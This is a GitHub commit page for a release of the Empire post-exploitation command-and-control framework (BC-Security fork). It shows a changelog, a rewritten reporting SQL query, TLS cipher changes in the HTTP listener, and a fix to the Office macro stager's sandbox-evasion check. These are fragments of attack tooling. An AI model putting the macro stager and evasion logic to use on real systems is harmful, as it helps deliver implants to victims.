Skip to content

Commit

Permalink
Merge pull request #171 from BC-SECURITY/dev
Browse files Browse the repository at this point in the history 
v3.1.5 Master Release
  • Loading branch information
@Cx01N
Cx01N authored Apr 14, 2020
2 parents 4a14649 + 053bf32 commit d2da774
Show file tree
Hide file tree
Showing 6 changed files with 50 additions and 13 deletions.
2 changes: 1 addition & 1 deletion VERSION
View file
Original file line number Diff line number Diff line change
@@ -1 +1 @@
3.1.4
3.1.5
7 changes: 7 additions & 0 deletions changelog
View file
Original file line number Diff line number Diff line change
@@ -1,3 +1,10 @@
4/13/2020
------------
- Version 3.1.5 Master Release
- Fixed macro staging bug - #164 (@Hubbl3)
- Fixed TLS cipher suite issue with PowerShell 2 - #155 (@tyraniter)
- Updated API reporting for Starkiller integration - #168 (@Cx01N)

4/4/2020
------------
- Version 3.1.4 Master Release
Expand Down
32 changes: 29 additions & 3 deletions empire
View file
Original file line number Diff line number Diff line change
Expand Up @@ -1178,12 +1178,38 @@ def start_restful_api(empireMenu, suppress=False, username=None, password=None,
"""
Returns JSON describing the reporting events from the backend database.
"""
reportingRaw = execute_db_query(conn, 'SELECT ID, name, event_type, message, time_stamp, taskID FROM reporting')
reportingRaw = execute_db_query(conn, '''
SELECT
reporting.time_stamp,
event_type,
u.username,
substr(reporting.name, pos+1) as agent_name,
a.hostname,
taskID,
t.data as "Task",
r.data as "Results"
FROM
(
SELECT
time_stamp,
event_type,
name,
instr(name, '/') as pos,
taskID
FROM reporting
WHERE name LIKE 'agent%'
AND reporting.event_type == 'task' OR reporting.event_type == 'checkin') reporting
LEFT OUTER JOIN taskings t on (reporting.taskID = t.id) AND (agent_name = t.agent)
LEFT OUTER JOIN results r on (reporting.taskID = r.id) AND (agent_name = r.agent)
JOIN agents a on agent_name = a.session_id
LEFT OUTER JOIN users u on t.user_id = u.id
ORDER BY reporting.time_stamp DESC
''')
reportingEvents = []

for reportingEvent in reportingRaw:
[ID, name, event_type, message, time_stamp, taskID] = reportingEvent
reportingEvents.append({"ID":ID, "agentname":name, "event_type":event_type, "message":json.loads(message), "timestamp":time_stamp, "taskID":taskID})
[time_stamp, event_type, user_name, agent_name, host_name, taskID, task, results] = reportingEvent
reportingEvents.append({"timestamp":time_stamp, "event_type":event_type, "username":user_name, "agent_name":agent_name, "host_name":host_name, "taskID":taskID, "task":task, "results":results})

return jsonify({'reporting' : reportingEvents})

Expand Down
14 changes: 8 additions & 6 deletions lib/common/empire.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -15,7 +15,7 @@
from builtins import str
from builtins import range

VERSION = "3.1.4 BC-Security Fork"
VERSION = "3.1.5 BC-Security Fork"

from pydispatch import dispatcher

Expand Down Expand Up @@ -968,8 +968,9 @@ def do_report(self, line):
# Empire Log
cur.execute("""
SELECT
time_stamp,
reporting.time_stamp,
event_type,
u.username,
substr(reporting.name, pos+1) as agent_name,
a.hostname,
taskID,
Expand All @@ -986,9 +987,10 @@ def do_report(self, line):
FROM reporting
WHERE name LIKE 'agent%'
AND reporting.event_type == 'task' OR reporting.event_type == 'checkin') reporting
LEFT OUTER JOIN taskings t on (reporting.taskID = t.id) AND (agent_name = t.agent)
LEFT OUTER JOIN results r on (reporting.taskID = r.id) AND (agent_name = r.agent)
JOIN agents a on agent_name = a.session_id
LEFT OUTER JOIN taskings t on (reporting.taskID = t.id) AND (agent_name = t.agent)
LEFT OUTER JOIN results r on (reporting.taskID = r.id) AND (agent_name = r.agent)
JOIN agents a on agent_name = a.session_id
LEFT OUTER JOIN users u on t.user_id = u.id
""")
rows = cur.fetchall()
print(helpers.color("[*] Writing data/master.log"))
Expand All @@ -1000,7 +1002,7 @@ def do_report(self, line):
for n in range(len(row)):
if isinstance(row[n], bytes):
row[n] = row[n].decode('UTF-8')
f.write('\n' + row[0] + ' - ' + row[3] + ' (' + row[2] + ')> ' + str(row[5]) + '\n' + str(row[6]) + '\n')
f.write('\n' + row[0] + ' - ' + row[3] + ' (' + row[2] + ')> ' + str(row[5]) + '\n' + str(row[6]) + '\n' + str(row[7]) + '\n')
f.close()
cur.close()
finally:
Expand Down
6 changes: 3 additions & 3 deletions lib/listeners/http.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -1239,9 +1239,9 @@ def handle_post(request_uri):

context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
cipherlist = ["ECDHE-RSA-AES256-GCM-SHA384", "ECDHE-RSA-AES128-GCM-SHA256", "ECDHE-RSA-AES256-SHA384",
"ECDHE-RSA-AES256-SHA", "AES256-SHA256", "AES128-SHA256"]
selectciph = random.choice(cipherlist)
cipherlist_tls12 = ["ECDHE-RSA-AES256-GCM-SHA384", "ECDHE-RSA-AES128-GCM-SHA256", "ECDHE-RSA-AES256-SHA384", "AES256-SHA256", "AES128-SHA256"]
cipherlist_tls10 = ["ECDHE-RSA-AES256-SHA"]
selectciph = random.choice(cipherlist_tls12)+':'+random.choice(cipherlist_tls10)
context.set_ciphers(selectciph)
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
Expand Down
2 changes: 2 additions & 0 deletions lib/stagers/windows/macro.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -177,6 +177,8 @@ def generate(self):
macro += "Public Function "+Method+"() As Variant\n"

if OutlookEvasionBool == True:
macro += "\tstrComputer = \".\"\n"
macro += "\tSet objWMIService = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\cimv2\")\n"
macro += "\tSet ID = objWMIService.ExecQuery(\"Select IdentifyingNumber from Win32_ComputerSystemproduct\")\n"
macro += "\tFor Each objItem In ID\n"
macro += "\t\tIf StrComp(objItem.IdentifyingNumber, \"2UA20511KN\") = 0 Then End\n"
Expand Down

0 comments on commit d2da774

Please sign in to comment.